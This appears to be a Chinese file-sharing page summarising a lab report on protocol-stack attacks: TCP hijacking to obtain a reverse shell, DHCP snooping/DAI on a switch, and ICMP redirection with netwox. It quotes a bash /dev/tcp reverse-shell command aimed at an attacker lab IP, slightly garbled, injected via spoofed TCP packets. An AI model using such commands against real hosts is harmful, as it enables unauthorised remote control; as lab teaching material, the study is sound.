协议栈实战:TCP劫持与ICMP重定向实验
需积分: 10 39 浏览量
更新于2024-09-03
收藏 704KB PDF 举报
本篇博客记录了作者在网络攻防实验中的初步探索,主要涉及三个方面的协议栈攻击技术:TCP劫持shell反弹、交换机上的DHCP snooping DAI IPS保护以及ICMP重定向攻击。
首先,TCP劫持shell反弹部分,黑客通过在本地机器(192.168.168.131)上开启一个监听端口(8888),利用`bash -i >&/dev/tcp/192.168.168.131/88880>&1`这一命令将输入重定向到远程服务器。将此命令转换为十六进制后,黑客会在假的TCP报文中使用这个数字来发送恶意数据,使得连接的目标(如DataServer)实际上执行了黑客的shell命令。实验结果显示,黑客成功实现了对DataServer的控制。
接着,作者讨论了DHCP snooping DAI IPS(Dynamic ARP Inspection)在交换机(S1)上的配置。DHCP snooping是一种网络安全机制,用于防止ARP欺骗和非法的DHCP服务,DAI IPS进一步增强了这种保护,通过检查DHCP请求和应答来检测潜在的攻击。然而,后续的配置步骤并未详述,显示出这部分可能需要更深入的理解和实践。
最后,ICMP重定向攻击部分,作者构建了一个简单的网络拓扑,其中Kali系统作为攻击者,可以通过设置端口转发功能,利用netwox工具发送伪造的ICMP重定向报文,误导目标路由器改变路由策略。例如,当PC1试图ping PC2时,由于ICMP重定向,攻击者可以在交换机G0/0/2上抓包,实现对通信路径的控制,达到阻断或监控目的。
这篇博客提供了一种实战视角,展示了如何利用协议栈进行基础的网络攻击,并提到了一些关键的配置和操作技巧。对于网络攻防、安全审计或者想深入了解网络协议的读者来说,这是一个很好的学习资料,强调了理解并掌握这些技术的重要性。
154 浏览量
127 浏览量
2021-09-06 上传
2022-11-12 上传
134 浏览量
2021-09-06 上传
2022-10-28 上传
2023-03-10 上传
2022-06-30 上传
星云踏痕
- 粉丝: 1
- 资源: 2
最新资源
- jquery开关按钮基于Bootstrap开关按钮特效
- merkle-react-client:客户
- 财务管理系统javaweb项目
- DOM-Parsing:DOM解析和序列化
- FastReport v6.7.11 Enterprise installer .zip
- pid控制器代码matlab-AutomatedBalancingRobot:自动平衡机器人是一个项目,其中建造了一个两轮机器人,并将其编程为
- 基于MATLAB模型设计的FPGA开发与实现.zip_UBK_matlab与fpga_simulink模型_struck9hw_
- ubiq:基于HugSQL和GraphQL的Web应用程序,移动部分最少
- 行业文档-设计装置-一种折叠式防滑书立.zip
- 意法半导体参考文献及软件资料.7z
- LoRa-High-Altitude-Balloon:这是蒙大拿州立大学LoRa小组顶峰项目的存储库,该项目是蒙大纳州太空资助财团BOREALIS实验室的项目。 以下代码在定制板上运行,该定制板上旨在收集高空气球有效载荷上的大气数据
- BW_Anal-开源
- nuaa_check_action:inuaa打卡,基于GitHub Action的南航校内,校外打卡
- alex_presso
- perf:PERF是详尽的重复查找器
- 行业文档-设计装置-一种折叠式包装纸箱.zip